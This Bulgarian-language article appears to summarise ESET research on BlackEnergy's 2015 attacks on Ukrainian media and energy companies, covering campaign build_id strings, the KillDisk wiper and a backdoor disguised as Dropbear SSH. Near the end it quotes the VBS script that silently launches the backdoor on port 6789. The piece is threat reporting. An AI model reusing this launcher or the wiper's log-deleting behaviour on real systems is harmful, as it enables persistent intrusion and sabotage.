Вирусът BlackEnergy напада медии и енергийни компании

Троянецът BlackEnergy отново върлува в Украйна, като този път е още по-опасен и е насочен срещу медийния и енергийния сектор. Зловредният код е добре известен от атаките срещу множество неправителствени организации в Украйна и Полша през 2014 г. Същият вирус без използван и за шпиониране на крайни потребители. 

Най-новата модификация на BlackEnergy бе разкрита от изследователите на ESET в края на 2015 г. Тя отново разчита на пробойна в сигурността на операционната система, за да внедри т.нар.  KillDisk компонент. Това поколение на зловредния код е използвано за атаки срещу украински медии и енергийната индустрия на страната.

Веднъж активирани, вариантите на BlackEnergy Lite дават на кибер престъпника достъп до инфектираното устройство. Чрез него се потвърждава идентичността на мишената – което стартира зареждането на стандартен вариант на BlackEnergy, използван най-вече за подслушването на потребителя.

С изключение на някои командни сървъри, конфигурацията съдържа текстовата комбинация build_id. Чрез нея се идентифицира типа атака или опит за атака от страна на BlackEnergy. Комбинацията от използваните числа и букви понякога разкрива информация за конкретната кампания или мишените.

Екипът на ESET засича следните конфигурации през 2015:

2015en
khm10
khelm
2015telsmi
2015ts
2015stb
kiev_o
brd2015
11131526kbp
02260517ee
03150618aaa
11131526trk

Предполага се, че всяка комбинация има специално значение. Например, 2015telsmi вероятно съдържа акронима SMI – Sredstva Massovoj Informacii, както и 2015en би следвало да значи – Energy. Сред по-очевидните е Kiev, чието значение е ясно.

През 2015 г. в кода на BlackEnergy е въведено използването на нов компонент KillDisk в продукти като Win32/KillDisk.NBB, WIN32/KillDisk.NBD trojan. Основаната му цел е да наруши целостта на определена информация на устройството. Вирусът презаписва файловете и не позволява на системата да ги възстанови в първоначалния им работещ вид. 

Първият такъв случай е документиран през ноември 2015 година от CERT-UA. Той бил засечен, след като множество медии били атакувани по време на провеждащите се избори в Украйна. Цели текстови файлове и видео материали били безвъзвратно заличавани от инфектираните устройства. Списъкът на файловете разширения наброява близо 4000.

Figure 2

KillDisk компонентът, използван при атаките на енергийната индустрия, се откроява с минимални разлики. Анализът на експертите от ESET показва следните промени в действието му:

приема команда, за да заложи точно време на активиране на зловредния код;
изтрива Windows Event Logs: Application, Security, Setup, System;
концентриран в премахването на много по-малко файлове – само 35.

Както в предишния случай, системата не може да възвърне старите файлове. В добавка обаче е включена функционалност, която да саботира индустриални системи. След активация вариантът на KillDisk компонента открива и спира 2 процеса със следните имена:

komut.exe
sec_service.exe
Приложение, представящо се за SSH сървър
След обстоен анализ на ESET бе разкрито приложение, което се представя за легитимен SSH сървър. Името, с което то присъства в системата, е Dropbear SSH. Тайният сървър се активира чрез VBS файл, който е със следното съдържание:

Set WshShell = CreateObject(“WScript.Shell”)
WshShell.CurrentDirectory = “C:WINDOWSTEMPDropbear”
WshShell.Run “dropbear.exe -r rsa -d dss -a -p 6789″, 0, false

Както става видно, с SSH сървъра се установява връзка чрез порт 6789, давайки постоянен достъп на кибер престъпниците до мрежата. Разработчиците на зловредния код са си оставили и допълнителна вратичка, в случай че по някаква причина присъствието им бъде усетено:

При въвеждане на изискваната парола се дава достъп на потребителя. Същият принцип важи при оторизацията с ключ.

Решенията за антивирусна защита на ESET за дома и за бизнеса разпознават вируса под името Win32/SSHBearDoor.A trojan.